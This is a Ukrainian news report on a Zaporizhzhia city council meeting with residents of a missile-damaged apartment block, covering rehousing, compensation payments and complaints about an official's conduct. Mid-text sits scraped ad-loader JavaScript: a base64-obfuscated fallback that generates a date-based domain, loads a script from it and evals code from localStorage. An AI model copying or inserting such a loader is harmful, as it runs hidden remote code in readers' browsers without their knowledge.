«Запоріжжя не прокажене»: як пройшла зустріч влади і мешканців зруйнованого будинку (ФОТО, ВІДЕО)

Сьогодні, 6 березня, у Запорізькій міській раді відбулося обговорення ситуації, у якій опинились мешканці багатоквартирного будинку після влучання в нього російської ракети.

Як повідомляє «Акцент«, у обговоренні разом з жителями взяли участь: т.в.о. міського голови Анатолій Куртєв, його заступники та керівники департаментів міськради. Також на місці було присутнє керівництво Вознесенівського району.

Ракетний удар по житловій багатоповерхівці у Запоріжжі: фоторепортаж з місця теракту

Наразі у будинку відсутнє опалення, електропостачання, газопостачання та вода. Після завершення розбору завалів, його стан детально вивчатимуть спеціальні служби. Заступник міського голови з питань ЖКГ Віктор Гординський каже, що лише в одному з під’їздів, можливо, зможуть відновити електропостачння найближчим часом. Це питання опрацьовують.


Віктор Гординський

Серед основних питань, які обговорювались: допомога у розселенні, відшкодування збитків, фінансова підтримка, некоректне відношення посадовців до постраждалих, відсутність потрібної комунікації з органами влади.

Про що говорили мешканці будинку

Найбільше питань до влади стосувалися саме розселення та відшкодування втраченого майна після ракетного удару. Жителі будинку скаржилися, що не змогли отримати зрозумілої інструкції щодо подальших дій після руйнування житла.

«Ніхто не знає, як себе вести у такій ситуації. Я хочу, щоб кожен житель Запоріжжя знав, що потрібно робити. Це проблема того, хто з цим зтикається. Ми залишилися без житла! Що мені робити? В мене повинен бути алгоритм дій. Я не повинна тут сидіти писати номери якісь, куди не дозвонися. Нас ніхто не ніде не чекає, тепер це лише наша проблема. І це правда. Кожен, хто тут сидить, це підтвердить», — сказала жителька будинку Анна Прус, яка дивом вціліла після атаки.

Анна Прус

Вона додала, що залишилася незадоволена діями влади у порівнянні з тим, як працюють посадовці у сусідньому Дніпрі у схожій ситуації.

«У Дніпрі коли сталася трагедія, усі згуртувалися. І у людей тепер і житло і відшкодування. Ми такі ж люди, як і дніпряни, як і люди буд-якого міста України. Запоріжжя не прокажене. Ми хочему тут жити«, — сказала жінка, звертаючись до Анатолія Куртєва.


Анатолій Куртєв

Крім того, жителі акцентували увагу на поведінці заступника голови Вознесенівської районної адміністрації Віктора Хоцького. Кілька мешканців одночасно повідомили, що він нахабно спілкувався з постраждалими.

«Він нас посилав, хамив. Казав: «Ви піцу їсте, чай є, що вам ще потрібно?»«, — передає слова посадовця одна з присутніх.

Також мешканці будинку казали, що їм не зрозумілий механізм нарахування виплат, фінансової допомоги. Жителі будинку прагнуть дізнатися, право на яке тимчасове житло вони мають.

Що відповіли представники влади

Т.в.о. міського голови Анатолій Куртєв неодноразово зауважував, що одразу після вчинення теракту на місці працювали усі відповідні служби. Проте деякі питання стосовно будинку було неможливо з’ясувати, поки тривав розбір завалів. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Перший заступник міського голови Олександр Власюк відповів щодо тимчасового житла:

«Всім людям, які звернулися до нашої палатки, було запропоновано тимчасовий прихисток (ред. у гуртожитки). Немає ще розуміння, наскільки сильні пошкодження. Зараз, після того, як ми отримаємо доступ до будівлі, ми відпрацюємо можливість підключень комунікацій до будинку та починаємо робити експертизу», — зауважив Олександр Власюк.

Олександр Власюк

Сьогодні, 6 березня, представники районної адміністрації проведуть обстеження кожної з квартир, після чого, завтра, мешканцям обіцяють видати акти про пошкоджене майно, які потрібні для подальшого відшкодування збитків, зауважив заступник міського голови Віктор Гординський.

«Цей акт є підставою для реєстрації як ВПО. Це дає право на виплати. Цей акт є підставою відповідно до програми на отримання щомісячної компенсації у розмірі по 10 тисяч гривень до відновлення житла. У разі, якщо є мешканці пільгових категорій, відповідно до акту, людина отримає 15 тисяч одноразово», — у свою чергу зазначив інший заступник міського голови Анатолій Васюк.

Анатолій Васюк

На сесії міської ради 4 березня депутати вже проголосували за виділення коштів на розробку проектно-кошторисної документації, що передує роботам з відновлення будинку.

Наразі влада також пообіцяла розглянути питання заселення мешканців до арештованих багатоповерхових будинків, які є у Запоріжжі. Цю пропозицію озвучила керівниця ініціативної групи мешканців будинку.

Крім того, голова Вознесенівської РА Євген Вербовщук відреагував на повідомлення про некоректну поведінку свого заступника Віктора Хоцького.

«Я вибачаюся, це мій працівник. Ви всі на нього поскаржилися. Приймемо відповідні міри», — каже Вербовщук присутнім.

Фінансова допомога, доступна мешканцям

Післа оформлення необхідних актів, мешканці зможуть отримати:

ВПО. 2 тисячі на дорослу людину. 3 тисячі на дітей;15 тисяч на поховання родичів;10 тисяч щомісячно до відновлення житла;15 тисяч одноразово для пільговиків;Виплати від ООН — 6,6 тисяч на кожного мешканця;50 тисяч гривень. Фінансова допомога з депутатського фонду Анатолія Куртєва. Хто саме має право на цю виплату, потребує уточнення.

Більш детально про дискусію жителів будинку та представників влади, дивіться у відео «Акцента» з зустрічі у міскраді: (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/zaporizhzhya-ne-prokazhene-yak-projshla-zustrich-vladi-i-meshkantsiv-zrujnovanogo-budinku-foto-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top